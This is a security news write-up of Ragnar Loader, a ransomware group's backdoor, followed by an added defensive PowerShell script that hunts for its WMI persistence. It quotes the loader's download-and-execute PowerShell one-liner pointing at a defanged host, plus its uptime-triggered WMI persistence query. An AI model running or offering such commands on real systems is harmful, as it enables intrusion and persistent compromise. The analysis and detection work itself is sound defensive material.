A sophisticated malware toolkit known as Ragnar Loader has been identified as a critical component in targeted ransomware attacks.
The loader, also known as Sardonic Backdoor, serves as the primary infiltration mechanism for the Monstrous Mantis ransomware group, formerly known as Ragnar Locker, which has been attacking organizations since its emergence in 2020.
Security researchers have determined that Ragnar Loader’s primary function is to establish and maintain persistent access to compromised systems.
Once deployed, the malware enables threat actors to maintain long-term footholds within targeted environments, facilitating extended malicious operations.
The toolkit employs multi-layered obfuscation, dynamic decryption routines, and sophisticated persistence mechanisms that pose significant challenges to conventional security defenses.
Catalyst researchers’ analysis reveals that Ragnar Loader utilizes PowerShell-based payloads for execution, incorporating strong encryption and encoding methods including RC4 and Base64 to conceal its operations.
The malware employs process injection strategies to establish stealthy control over compromised systems.
A typical infection begins with PowerShell commands such as “powershell.exe -nop -ep bypass -c iex (New-Object System.Net.WebClient).DownloadString('https://104-238-34-209[.]nip[.]io/4c8b09')”, which downloads and executes the initial payload.
The loader is typically distributed as part of a comprehensive toolkit that includes multiple components: a node initialization script, pivoting files, remote desktop protocol files, and remote code execution scripts.
These tools collectively provide ransomware operators with extensive capabilities for lateral movement and persistence within victim networks.
Evasion Techniques
The malware’s technical sophistication is evident in its multi-stage deployment process.
After initial execution, Ragnar Loader decrypts byte arrays by first decompressing them and then applying RC4 decryption.
The shellcode exhibits self-modifying behavior through XOR decryption processes.
To establish persistence, the malware creates WMI filters that trigger at specific system uptimes, using queries such as “SELECT * FROM InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System AND TargetInstance.SystemUpTime >= 140 AND TargetInstance.SystemUpTime < 250”.
This fileless persistence technique helps the malware remain undetected on compromised systems.
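One way a SOC or DFIR analyst can hunt for this kind of persistence on a host, as an added example that is not taken from the Catalyst report: it enumerates the permanent WMI subscriptions in the root/subscription namespace and flags any binding whose filter matches the uptime trigger quoted above or whose consumer launches PowerShell. The two regexes are assumptions derived from the indicators quoted on this page, and the script assumes an elevated PowerShell session on Windows.

```powershell
# Hunt for WMI event subscriptions of the kind described above:
# a filter keyed on Win32_PerfFormattedData_PerfOS_System.SystemUpTime
# bound to a consumer that runs PowerShell. Added example; run elevated.
$ns = 'root/subscription'

$filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
$consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer   # returns all derived consumer classes
$bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding

# Heuristics (assumed) built from the query and command line quoted in the article
$uptimeFilter = 'Win32_PerfFormattedData_PerfOS_System.*SystemUpTime'
$psConsumer   = 'powershell|-ep\s+bypass|-nop|\biex\b|DownloadString'

# Binding references arrive as CimInstances; older WMI output gives strings like __EventFilter.Name="x"
function Get-RefName($ref) {
    if ($ref -is [string]) { return ($ref -split '"')[1] }
    return $ref.Name
}

$bindings | ForEach-Object {
    $fName = Get-RefName $_.Filter
    $cName = Get-RefName $_.Consumer

    $f = $filters   | Where-Object Name -eq $fName
    $c = $consumers | Where-Object Name -eq $cName

    # The executable payload lives in different properties depending on consumer class
    $payload = (@($c.CommandLineTemplate, $c.ExecutablePath, $c.ScriptText) -join ' ').Trim()

    $reasons = @()
    if ($f.Query -match $uptimeFilter) { $reasons += 'uptime-triggered filter' }
    if ($payload -match $psConsumer)   { $reasons += 'PowerShell-launching consumer' }

    [pscustomobject]@{
        Filter   = $fName
        Consumer = $cName
        Class    = $c.CimClass.CimClassName
        Query    = $f.Query
        Payload  = $payload
        Suspect  = $reasons -join ', '
    }
} | Where-Object Suspect | Format-List
```

Drop the final `Where-Object Suspect` to list every binding for manual review; legitimate subscriptions (for example SCCM or monitoring agents) will appear there too, so treat the Suspect column as a triage aid rather than a verdict.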
The loader injects its payload into legitimate Windows processes, particularly WmiPrvSE.exe, after stealing tokens from lsass.exe to elevate privileges.
This technique allows the malware to operate with extended system access while hiding behind legitimate processes.
Once established, the backdoor can receive multiple commands from its command and control server, including functions to load DLL plugins, read and write files, execute shellcode, and create interactive sessions.